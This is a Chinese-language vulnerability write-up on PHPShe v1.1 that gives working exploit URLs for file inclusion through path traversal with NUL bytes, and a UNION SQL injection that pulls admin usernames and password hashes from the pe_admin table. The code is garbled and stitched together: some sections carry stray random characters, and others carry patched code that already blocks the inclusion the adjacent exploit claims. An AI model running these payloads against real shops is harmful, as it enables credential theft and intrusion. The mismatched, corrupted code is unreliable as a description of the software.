
phpshe v1.1多处SQL注入和文件包含漏洞Getshell

/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By: : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0×00 整体大概参数传输

//common.php
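// Request, session and cookie data is copied into prefixed globals:
//   $_g_* (GET), $_p_* (POST), $_s_* (SESSION), $_c_* (COOKIE).
// Every $_g_/$_p_/$_c_ variable is attacker-controlled. pe_trim() and
// pe_stripslashes() are not shown here; nothing visible suggests they do
// any SQL or path escaping, so every consumer must validate/escape these
// values itself before using them in SQL, include() paths, unserialize(), etc.
//
// get_magic_quotes_gpc() was deprecated in PHP 7.4 and removed in PHP 8.0;
// calling it unguarded is a fatal error there. function_exists() keeps the
// file loadable on newer runtimes, where magic quotes are simply off.
if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
    // Magic quotes added backslashes on input; undo them before trimming.
    !empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
    !empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
    !empty($_GET) && extract(pe_trim($_GET), EXTR_PREFIX_ALL, '_g');
    !empty($_POST) && extract(pe_trim($_POST), EXTR_PREFIX_ALL, '_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION), EXTR_PREFIX_ALL, '_s');
// Cookies are stripslashed unconditionally (unlike GET/POST); kept as in the original.
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)), EXTR_PREFIX_ALL, '_c');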
0×01 包含漏洞

//首页文件
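<?php
include('common.php');

// Cached lookup tables consumed by the templates.
$cache_category = cache::get('category');
$cache_category_arr = cache::get('category_arr');
$cache_class = cache::get('class');
$cache_ad = cache::get('ad');
$cache_link = cache::get('link');
$cache_page = cache::get('page');

// $cache_setting is presumably populated by common.php (not visible here).
$web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array();

// Cart size: logged-in users are counted via $db->pe_num(); guests from the
// cart_list cookie ($_c_cart_list). That cookie is attacker-controlled and is
// fed to unserialize(), which can instantiate arbitrary classes (PHP object
// injection). Switching the cookie to json_encode/json_decode requires
// changing the writer as well, so here only the duplicated unserialize()
// call, the undefined-variable notice and the non-array count() are fixed.
if (pe_login('user')) {
    $cart_num = $db->pe_num('cart', array('user_id'=>$_s_user_id));
} else {
    $cart_list = isset($_c_cart_list) ? unserialize($_c_cart_list) : false;
    $cart_num = is_array($cart_list) ? count($cart_list) : 0;
}

// $module and $mod originate from the request (see common.php routing).
// Restrict both to a plain identifier and require the resolved file to exist,
// so directory-traversal / NUL-byte values cannot leave module/.
$safe_name = '/^[A-Za-z0-9_]+$/';
if (!preg_match($safe_name, $module) || !preg_match($safe_name, $mod)) {
    header('HTTP/1.1 404 Not Found');
    exit;
}
$module_file = "{$pe['path_root']}module/{$module}/{$mod}.php";
if (!is_file($module_file)) {
    header('HTTP/1.1 404 Not Found');
    exit;
}
include($module_file);
pe_result();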
//common 文件 第15行开始
//url路由配置
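// URL routing: $mod, $act and $id are taken from POST first, then GET, then
// the 'index' default. All three are attacker-controlled and $mod/$act are
// later interpolated into an include() path (see index.php), so they are
// restricted to identifier characters here. !empty() keeps the original
// truthiness semantics but avoids the undefined-index notices that the bare
// $_POST['mod'] lookups produced.
$module = $mod = $act = 'index';
$mod = !empty($_POST['mod']) ? $_POST['mod'] : (!empty($_GET['mod']) ? $_GET['mod'] : $mod);
$act = !empty($_POST['act']) ? $_POST['act'] : (!empty($_GET['act']) ? $_GET['act'] : $act);
// $id keeps whatever value it may already have had when neither source sets it.
$id = !empty($_POST['id']) ? $_POST['id'] : (!empty($_GET['id']) ? $_GET['id'] : (isset($id) ? $id : null));

// Reject anything that is not a plain identifier by falling back to the
// default route. A 404 response would be the stricter alternative; the
// fallback is used here so behaviour for valid requests is unchanged.
$route_name = '/^[A-Za-z0-9_]+$/';
if (!is_string($mod) || !preg_match($route_name, $mod)) {
    $mod = 'index';
}
if (!is_string($act) || !preg_match($route_name, $act)) {
    $act = 'index';
}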
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00. W6 j# t% g# l


0×02 搜索注入
<code id="code2">

//product.php文件
case 'list':: I# B; S9 P1 Z# r5 T
$category_id = intval($id);
. H3 @7 h( h+ t4 k& L0 P$info = $db->pe_select('category', array('category_id'=>$category_id));; U) L  R$ r  Z: @
//搜索% ]  Y7 K/ j% @: H$ O% \5 H
$sqlwhere = " and `product_state` = 1";
7 G5 Q; D$ A+ X* c1 N) p# S$ Bpe_lead('hook/category.hook.php');& L+ h. J" E, T" c' m
if ($category_id) {9 T( g5 a; g- `2 p0 {3 T7 c
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
1 F$ r" `% c! b' t2 Q9 r" H}7 @3 p8 Z/ z7 g( c
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
: k) C8 ]& w2 O) J4 a/ wif ($_g_orderby) {
5 {5 {/ z5 r% {3 Y3 u$orderby = explode('_', $_g_orderby);$ A6 ]6 A" s3 B# u3 o. P6 j5 X
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
* o: Q6 A$ ~, a* W! g4 D3 i4 w* y}! c" Y( U' r& G$ `2 I' G
else {, x  s/ s1 J  J2 R5 a0 D! B
$sqlwhere .= " order by `product_id` desc";
  y! [/ \4 t4 Q9 [* I' d}/ y& C, _* ~* O9 \1 W
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
/ m( B2 b. i: A//热卖排行
+ p. w  T. i3 C8 x" e* u$product_hotlist = product_hotlist();
$ ]8 o% p  I0 U# {% Y//当前路径
2 C% B# b: a) W7 P$nowpath = category_path($category_id);2 v, c- e2 o2 c! t& d& P; O
$seo = pe_seo($info['category_name']);
+ T$ f* V7 ]+ r. P: k9 {include(pe_tpl('product_list.html'));: J, y$ P9 f8 w. u# u
//跟进selectall函数库
/**
 * Fetch all rows of table dbpre.$table that satisfy $where.
 *
 * $table and $field are interpolated into the SQL text without any escaping,
 * so they must never be derived from user input. $where is passed through
 * _dowhere() (not shown here); the product.php caller hands it a raw string
 * condition, so string conditions are expected to already be escaped by the
 * caller. $limit_page is forwarded to sql_selectall() — the caller on this
 * page passes array(16, $_g_page), which looks like (page size, page number),
 * but confirm against sql_selectall().
 *
 * @param string       $table      table name without the dbpre prefix
 * @param string|array $where      condition, passed to _dowhere()
 * @param string       $field      column list, default '*'
 * @param array        $limit_page paging spec handed to sql_selectall()
 * @return mixed whatever sql_selectall() returns
 */
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
    $condition = $this->_dowhere($where);
    $query = "select {$field} from `" . dbpre . "{$table}` {$condition}";
    return $this->sql_selectall($query, $limit_page);
}
//exp
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1

</code>, P. d% i2 R! S9 K
0×03 包含漏洞2

<code id="code3">

//order.php

case 'pay':

$order_id = pe_dbhold($_g_id);


+ m( J8 \: _, h# ~8 Y$cache_payway = cache::get('payway');

foreach($cache_payway as $k => $v) {

$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


4 H. P% Q0 Q0 m8 R# `0 ~& Q  cif ($k == 'bank') {


: j) x2 p: |: D, W9 y' M  c$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


3 d8 X/ w/ M' e5 S: Z}


$ ^0 [1 o+ C: u( o}


, A0 Y0 D5 f  T% o2 L$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


( i3 Q  o2 q! R!$order['order_id'] && pe_error('订单号错误...');

if (isset($_p_pesubmit)) {

if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

foreach ($info_list as $v) {


0 J9 s5 I- b: x" e2 c$order['order_name'] .= "{$v['product_name']};";4 \+ {! x* ]( |- M; f/ s! N

}


0 T4 a& m# P3 U0 M9 u  c, y% _echo '正在为您连接支付网站,请稍后...';

include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


; A5 d; L/ i1 Q* {: h$ o}//当一切准备好的时候就可以进行"鸡肋包含了"


* D# Z! V2 l: U' R! Q& A3 s. ?else {


& E% y  @1 }! ~4 U' wpe_error('支付错误...');

}

}

$seo = pe_seo('选择支付方式');

include(pe_tpl('order_pay.html'));

break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
